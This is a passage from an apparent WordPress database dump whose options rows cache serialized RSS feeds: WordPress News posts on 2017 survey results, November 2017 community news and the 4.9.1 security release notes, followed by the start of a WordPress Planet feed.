td>\n<td>1.74%</td>\n<td>240</td>\n<td>1.56%</td>\n</tr>\n<tr>\n<td>Indonesia</td>\n<td></td>\n<td></td>\n<td>230</td>\n<td>1.58%</td>\n<td>226</td>\n<td>1.47%</td>\n</tr>\n<tr>\n<td>Iran, Islamic Republic of</td>\n<td></td>\n<td></td>\n<td>190</td>\n<td>1.30%</td>\n<td>173</td>\n<td>1.13%</td>\n</tr>\n<tr>\n<td>Sweden</td>\n<td></td>\n<td></td>\n<td>144</td>\n<td>0.99%</td>\n<td>173</td>\n<td>1.13%</td>\n</tr>\n<tr>\n<td>Nigeria</td>\n<td></td>\n<td></td>\n<td>196</td>\n<td>1.35%</td>\n<td>172</td>\n<td>1.12%</td>\n</tr>\n<tr>\n<td>South Africa</td>\n<td></td>\n<td></td>\n<td>193</td>\n<td>1.33%</td>\n<td>172</td>\n<td>1.12%</td>\n</tr>\n<tr>\n<td>Russian Federation</td>\n<td></td>\n<td></td>\n<td>181</td>\n<td>1.24%</td>\n<td>151</td>\n<td>0.98%</td>\n</tr>\n<tr>\n<td>Poland</td>\n<td></td>\n<td></td>\n<td>129</td>\n<td>0.89%</td>\n<td>137</td>\n<td>0.89%</td>\n</tr>\n<tr>\n<td>Romania</td>\n<td></td>\n<td></td>\n<td>144</td>\n<td>0.99%</td>\n<td>132</td>\n<td>0.86%</td>\n</tr>\n<tr>\n<td>Switzerland</td>\n<td></td>\n<td></td>\n<td>122</td>\n<td>0.84%</td>\n<td>130</td>\n<td>0.85%</td>\n</tr>\n<tr>\n<td>Philippines</td>\n<td></td>\n<td></td>\n<td>92</td>\n<td>0.63%</td>\n<td>125</td>\n<td>0.81%</td>\n</tr>\n<tr>\n<td>China</td>\n<td></td>\n<td></td>\n<td>136</td>\n<td>0.93%</td>\n<td>123</td>\n<td>0.80%</td>\n</tr>\n<tr>\n<td>Austria</td>\n<td></td>\n<td></td>\n<td>89</td>\n<td>0.61%</td>\n<td>122</td>\n<td>0.80%</td>\n</tr>\n<tr>\n<td>Ukraine</td>\n<td></td>\n<td></td>\n<td>105</td>\n<td>0.72%</td>\n<td>118</td>\n<td>0.77%</td>\n</tr>\n<tr>\n<td>Denmark</td>\n<td></td>\n<td></td>\n<td>107</td>\n<td>0.73%</td>\n<td>114</td>\n<td>0.74%</td>\n</tr>\n<tr>\n<td>Greece</td>\n<td></td>\n<td></td>\n<td>120</td>\n<td>0.82%</td>\n<td>114</td>\n<td>0.74%</td>\n</tr>\n<tr>\n<td>Portugal</td>\n<td></td>\n<td></td>\n<td>94</td>\n<td>0.65%</td>\n<td>109</td>\n<td>0.71%</td>\n</tr>\n<tr>\n<td>Vietnam</td>\n<td></td>\n<td></td>\n<td>101</td>\n<td>0.69%</td>\n<td>108</td>\n<td>0.70%</td>\n</tr>\n<tr>\n<td>Mexico</td>\n<td></td>\n<td></td>\n<td>94</td>\n<td>0.65%</td>\n<td>105</td>\n<td>0.68%</td>\n</tr>\n<tr>\n<td>Nepal</td>\n<td></td>\n<td></td>\n<td>76</td>\n<td>0.52%</td>\n<td>97</td>\n<td>0.63%</td>\n</tr>\n<tr>\n<td>Ireland</td>\n<td></td>\n<td></td>\n<td>72</td>\n<td>0.49%</td>\n<td>94</td>\n<td>0.61%</td>\n</tr>\n<tr>\n<td>Israel</td>\n<td></td>\n<td></td>\n<td>78</td>\n<td>0.54%</td>\n<td>94</td>\n<td>0.61%</td>\n</tr>\n<tr>\n<td>New Zealand</td>\n<td></td>\n<td></td>\n<td>77</td>\n<td>0.53%</td>\n<td>91</td>\n<td>0.59%</td>\n</tr>\n<tr>\n<td>Finland</td>\n<td></td>\n<td></td>\n<td>63</td>\n<td>0.43%</td>\n<td>90</td>\n<td>0.59%</td>\n</tr>\n<tr>\n<td>Turkey</td>\n<td></td>\n<td></td>\n<td>91</td>\n<td>0.62%</td>\n<td>86</td>\n<td>0.56%</td>\n</tr>\n<tr>\n<td>Malaysia</td>\n<td></td>\n<td></td>\n<td>91</td>\n<td>0.62%</td>\n<td>81</td>\n<td>0.53%</td>\n</tr>\n<tr>\n<td>Belgium</td>\n<td></td>\n<td></td>\n<td>84</td>\n<td>0.58%</td>\n<td>79</td>\n<td>0.51%</td>\n</tr>\n<tr>\n<td>Norway</td>\n<td></td>\n<td></td>\n<td>66</td>\n<td>0.45%</td>\n<td>79</td>\n<td>0.51%</td>\n</tr>\n<tr>\n<td>Argentina</td>\n<td></td>\n<td></td>\n<td>65</td>\n<td>0.45%</td>\n<td>76</td>\n<td>0.50%</td>\n</tr>\n<tr>\n<td>Bulgaria</td>\n<td></td>\n<td></td>\n<td>74</td>\n<td>0.51%</td>\n<td>72</td>\n<td>0.47%</td>\n</tr>\n<tr>\n<td>Japan</td>\n<td></td>\n<td></td>\n<td>61</td>\n<td>0.42%</td>\n<td>68</td>\n<td>0.44%</td>\n</tr>\n<tr>\n<td>Thailand</td>\n<td></td>\n<td></td>\n<td>69</td>\n<td>0.47%</td>\n<td>67</td>\n<td>0.44%</td>\n</tr>\n<tr>\n<td>Czech Republic</td>\n<td></td>\n<td></td>\n<td>76</td>\n<td>0.52%</td>\n<td>66</td>\n<td>0.43%</td>\n</tr>\n<tr>\n<td>Serbia</td>\n<td></td>\n<td></td>\n<td>89</td>\n<td>0.61%</td>\n<td>63</td>\n<td>0.41%</td>\n</tr>\n<tr>\n<td>Kenya</td>\n<td></td>\n<td></td>\n<td>58</td>\n<td>0.40%</td>\n<td>62</td>\n<td>0.40%</td>\n</tr>\n<tr>\n<td>Colombia</td>\n<td></td>\n<td></td>\n<td>39</td>\n<td>0.27%</td>\n<td>59</td>\n<td>0.38%</td>\n</tr>\n<tr>\n<td>Egypt</td>\n<td></td>\n<td></td>\n<td>40</td>\n<td>0.27%</td>\n<td>52</td>\n<td>0.34%</td>\n</tr>\n</tbody>\n</table>\n<h3>What is your age?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"51\" />\n<col width=\"47\" />\n<col width=\"51\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: All Respondents</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses (This question was not asked in 2015.)</td>\n<td></td>\n<td></td>\n<td>14,944</td>\n<td></td>\n<td>15,636</td>\n<td></td>\n</tr>\n<tr>\n<td>60 and over</td>\n<td></td>\n<td></td>\n<td>1,139</td>\n<td>8%</td>\n<td>1,641</td>\n<td>11%</td>\n</tr>\n<tr>\n<td>50-59</td>\n<td></td>\n<td></td>\n<td>1,537</td>\n<td>10%</td>\n<td>1,996</td>\n<td>13%</td>\n</tr>\n<tr>\n<td>40-49</td>\n<td></td>\n<td></td>\n<td>2,205</td>\n<td>15%</td>\n<td>2,643</td>\n<td>17%</td>\n</tr>\n<tr>\n<td>30-39</td>\n<td></td>\n<td></td>\n<td>3,914</td>\n<td>26%</td>\n<td>3,972</td>\n<td>25%</td>\n</tr>\n<tr>\n<td>20-29</td>\n<td></td>\n<td></td>\n<td>5,013</td>\n<td>34%</td>\n<td>4,444</td>\n<td>28%</td>\n</tr>\n<tr>\n<td>Under 20</td>\n<td></td>\n<td></td>\n<td>1142</td>\n<td>8%</td>\n<td>941</td>\n<td>6%</td>\n</tr>\n</tbody>\n</table>\n<p>Thank you to everyone who made time to fill out the survey &#8212; we&#8217;re so happy you use WordPress, and we&#8217;re very grateful that you&#8217;re willing to share your experiences with us! Thanks also to everyone who spread the word about this survey, and to those of you who read all the way to the bottom of this post. <img src=\"https://s.w.org/images/core/emoji/2.4/72x72/1f609.png\" alt=\"😉\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /></p>\n<p><small><a id=\"text\"></a>*Text Field Questions: Each survey included some questions that could be answered only by filling out a text field. In the case of the questions &#8220;What is the best thing about WordPress?&#8221; and &#8220;What is the most frustrating thing about WordPress?&#8221; we listed the five most common responses, aggregated when applicable. In the case of the question “What is your gender?” in the 2016 and 2017 surveys, we aggregated responses as best we could. Responses meant to obscure respondents’ gender entirely are aggregated in “prefer not to answer.”</small></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"5310\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:33:\"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"The Month in WordPress: November 2017\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wordpress.org/news/2017/12/the-month-in-wordpress-november-2017/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Dec 2017 11:00:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5290\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:354:\"The WordPress project recently released WordPress 4.9, “Tipton” — a new major release named in honor of musician and band leader Billy Tipton. Read on to find out more about this and other interesting news from around the WordPress world in November. WordPress 4.9 “Tipton” On November 16, WordPress 4.9 was released with new features [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Hugh Lashbrooke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4197:\"<p>The WordPress project recently released WordPress 4.9, “Tipton” — a new major release named in honor of musician and band leader Billy Tipton. Read on to find out more about this and other interesting news from around the WordPress world in November.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>WordPress 4.9 “Tipton”</h2>\n\n<p>On November 16, <a href=\"https://wordpress.org/news/2017/11/tipton/\">WordPress 4.9 was released</a> with new features for publishers and developers alike. Release highlights include design locking, scheduling, and previews in the Customizer, an even more secure and usable code editing experience, a new gallery widget, and text widget improvements.</p>\n\n<p>The follow up security and maintenance, v4.9.1, <a href=\"https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/\">has now been released</a> to tighten up the security of WordPress as a whole.</p>\n\n<p>To get involved in building WordPress Core, jump into the #core channel in the<a href=\"https://make.wordpress.org/chat/\"> Making WordPress Slack group</a>, and follow<a href=\"https://make.wordpress.org/core/\"> the Core team blog</a>.</p>\n\n<h2>Apply to Speak At WordCamp Europe 2018</h2>\n\n<p>The next edition of WordCamp Europe takes place in June, 2018. While the organizing team is still in the early stages of planning, <a href=\"https://2018.europe.wordcamp.org/2017/11/15/are-you-ready-to-speak-at-the-largest-wordpress-event-in-europe/\">they are accepting speaker applications</a>.</p>\n\n<p>WordCamp Europe is the largest WordCamp in the world and, along with WordCamp US, one of the flagship events of the WordCamp program — speaking at this event is a great way to give back to the global WordPress community by sharing your knowledge and expertise with thousands of WordPress enthusiasts.</p>\n\n<h2>Diversity Outreach Speaker Training Initiative</h2>\n\n<p>To help WordPress community organizers offer diverse speaker lineups, <a href=\"https://make.wordpress.org/community/2017/11/13/call-for-volunteers-diversity-outreach-speaker-training/\">a new community initiative has kicked off</a> to use existing <a href=\"https://make.wordpress.org/training/handbook/speaker-training/\">speaker training workshops</a> to demystify speaking requirements and help participants gain confidence in their ability to share their WordPress knowledge in a WordCamp session.</p>\n\n<p>The working group behind this initiative will be meeting regularly to discuss and plan how they can help local communities to train speakers for WordCamps and other events.</p>\n\n<p>To get involved in this initiative, you can join the meetings at 5pm UTC every other Wednesday in the #community-team channel of the<a href=\"https://make.wordpress.org/chat/\"> Making WordPress Slack group</a>.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>Further Reading:</h2>\n\n<ul>\n    <li><a href=\"https://2017.us.wordcamp.org/\">WordCamp US 2017</a> is happening on December 1-3 in Nashville, with the annual State of the Word talk happening on Saturday afternoon — <a href=\"https://2017.us.wordcamp.org/live-stream/\">the live stream of the entire event is available to view for free</a>.</li>\n    <li><a href=\"https://xwp.co/tide-a-path-to-better-code-across-the-wordpress-ecosystem/\">Tide</a>, a new service from XWP designed to help users make informed plugin choices, is due to launch at WordCamp US.</li>\n    <li>Gutenberg development is continuing rapidly, with <a href=\"https://make.wordpress.org/core/2017/11/28/whats-new-in-gutenberg-28th-november/\">a packed new release</a> and a focus on <a href=\"https://make.wordpress.org/test/2017/11/22/testing-flow-in-gutenberg/\">usability testing</a>.</li>\n    <li>After some discussion among the community, <a href=\"https://make.wordpress.org/community/2017/11/10/discussion-micro-regional-wordcamps/\">a new type of micro-regional WordCamp</a> is going to be introduced into the global WordCamp program.</li>\n</ul>\n\n<p><em></em></p>\n\n<p><em>If you have a story we should consider including in the next “Month in WordPress” post, please <a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\">submit it here</a>.</em></p>\n\n<p><em></em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"5290\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:36:\"\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"WordPress 4.9.1 Security and Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Nov 2017 20:33:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5215\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:359:\"WordPress 4.9.1 is now available. This is a security and maintenance release for all versions since WordPress 3.7. We strongly encourage you to update your sites immediately. WordPress versions 4.9 and earlier are affected by four security issues which could potentially be exploited as part of a multi-vector attack. As part of the core team&#x27;s [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4268:\"<p>WordPress 4.9.1 is now available. This is a <strong>security and maintenance release</strong> for all versions since WordPress 3.7. We strongly encourage you to update your sites immediately.</p>\n\n<p>WordPress versions 4.9 and earlier are affected by four security issues which could potentially be exploited as part of a multi-vector attack. As part of the core team&#x27;s ongoing commitment to security hardening, the following fixes have been implemented in 4.9.1:</p>\n\n<ol>\n    <li>Use a properly generated hash for the <code>newbloguser</code> key instead of a determinate substring.</li>\n    <li>Add escaping to the language attributes used on <code>html</code> elements.</li>\n    <li>Ensure the attributes of enclosures are correctly escaped in RSS and Atom feeds.</li>\n    <li>Remove the ability to upload JavaScript files for users who do not have the <code>unfiltered_html</code> capability.</li>\n</ol>\n\n<p>Thank you to the reporters of these issues for practicing <a href=\"https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/\">responsible security disclosure</a>: <a href=\"https://twitter.com/0x62626262\">Rahul Pratap Singh</a> and John Blackbourn.</p>\n\n<p>Eleven other bugs were fixed in WordPress 4.9.1. Particularly of note were:</p>\n\n<ul>\n    <li>Issues relating to the caching of theme template files.</li>\n    <li>A MediaElement JavaScript error preventing users of certain languages from being able to upload media files.</li>\n    <li>The inability to edit theme and plugin files on Windows based servers.</li>\n</ul>\n\n<p><a href=\"https://make.wordpress.org/core/2017/11/28/wordpress-4-9-1-scheduled-for-november-29th/\">This post has more information about all of the issues fixed in 4.9.1 if you&#x27;d like to learn more</a>.</p>\n\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 4.9.1</a> or venture over to Dashboard → Updates and click &quot;Update Now.&quot; Sites that support automatic background updates are already beginning to update automatically.</p>\n\n<p>Thank you to everyone who contributed to WordPress 4.9.1:</p>\n\n<p><a href=\"https://profiles.wordpress.org/schlessera/\">Alain Schlesser</a>, <a href=\"https://profiles.wordpress.org/afercia/\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/la-geek/\">Angelika Reisiger</a>, <a href=\"https://profiles.wordpress.org/blobfolio/\">Blobfolio</a>, <a href=\"https://profiles.wordpress.org/bobbingwide/\">bobbingwide</a>, <a href=\"https://profiles.wordpress.org/chetan200891/\">Chetan Prajapati</a>, <a href=\"https://profiles.wordpress.org/dd32/\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/ocean90/\">Dominik Schilling (ocean90)</a>, <a href=\"https://profiles.wordpress.org/edo888/\">edo888</a>, <a href=\"https://profiles.wordpress.org/erich_k4wp/\">Erich Munz</a>, <a href=\"https://profiles.wordpress.org/flixos90/\">Felix Arntz</a>, <a href=\"https://profiles.wordpress.org/mista-flo/\">Florian TIAR</a>, <a href=\"https://profiles.wordpress.org/pento/\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/ibenic/\">Igor Benic</a>, <a href=\"https://profiles.wordpress.org/jfarthing84/\">Jeff Farthing</a>, <a href=\"https://profiles.wordpress.org/jbpaul17/\">Jeffrey Paul</a>, <a href=\"https://profiles.wordpress.org/jeremyescott/\">jeremyescott</a>, <a href=\"https://profiles.wordpress.org/joemcgill/\">Joe McGill</a>, <a href=\"https://profiles.wordpress.org/johnbillion/\">John Blackbourn</a>, <a href=\"https://profiles.wordpress.org/johnpgreen/\">johnpgreen</a>, <a href=\"https://profiles.wordpress.org/ryelle/\">Kelly Dwan</a>, <a href=\"https://profiles.wordpress.org/lenasterg/\">lenasterg</a>, <a href=\"https://profiles.wordpress.org/clorith/\">Marius L. J.</a>, <a href=\"https://profiles.wordpress.org/melchoyce/\">Mel Choyce</a>, <a href=\"https://profiles.wordpress.org/mariovalney/\">Mário Valney</a>, <a href=\"https://profiles.wordpress.org/natacado/\">natacado</a>, <a href=\"https://profiles.wordpress.org/odysseygate/\">odyssey</a>, <a href=\"https://profiles.wordpress.org/precies/\">precies</a>, <a href=\"https://profiles.wordpress.org/stodorovic/\">Saša</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>, and <a href=\"https://profiles.wordpress.org/westonruter/\">Weston Ruter</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"5215\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"\n	hourly	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"\n	1	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:4:\"site\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"14607090\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:9:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Wed, 07 Mar 2018 00:42:06 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:6:\"x-olaf\";s:3:\"⛄\";s:13:\"last-modified\";s:29:\"Thu, 01 Mar 2018 08:41:16 GMT\";s:4:\"link\";s:63:\"<https://wordpress.org/news/wp-json/>; rel=\"https://api.w.org/\"\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 1\";}}s:5:\"build\";s:14:\"20130911080210\";}','no'),(135,'_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1520426526','no'),(136,'_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1520383326','no'),(137,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1520426526','no'),(138,'_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n	\n	\n	\n	\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"WPTavern: WordPress Now Used on 30% of the Top 10 Million Sites\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78214\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://wptavern.com/wordpress-now-used-on-30-of-the-top-10-million-sites\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2379:\"<p><a href=\"https://w3techs.com/\">W3Techs</a>, a survey company that monitors usage of various web technologies, <a href=\"https://w3techs.com/technologies/details/cm-wordpress/all/all\">is reporting</a> that WordPress has reached 30% usage or 60.2% market share of all the websites whose content management systems it knows about. This represents a 0.6% increase since February 1st and 13.1% over the last seven years.</p>\n<p>Just five days ago, Matt Mullenweg, co-creator of WordPress, brought attention to the approaching milestone.</p>\n<blockquote class=\"twitter-tweet\">\n<p lang=\"und\" dir=\"ltr\">29.9%&#8230;</p>\n<p>&mdash; Matt Mullenweg (@photomatt) <a href=\"https://twitter.com/photomatt/status/969378724305973249?ref_src=twsrc%5Etfw\">March 2, 2018</a></p></blockquote>\n<p></p>\n<p>When it comes to WordPress&#8217; market share numbers, W3Techs is the most cited source. While some say that <a href=\"https://thenextweb.com/dd/2018/03/05/30-of-the-web-now-runs-on-wordpress/\">WordPress now powers 30% of the web</a>, <a href=\"https://w3techs.com/technologies\">technically</a>, it is used by 30% of 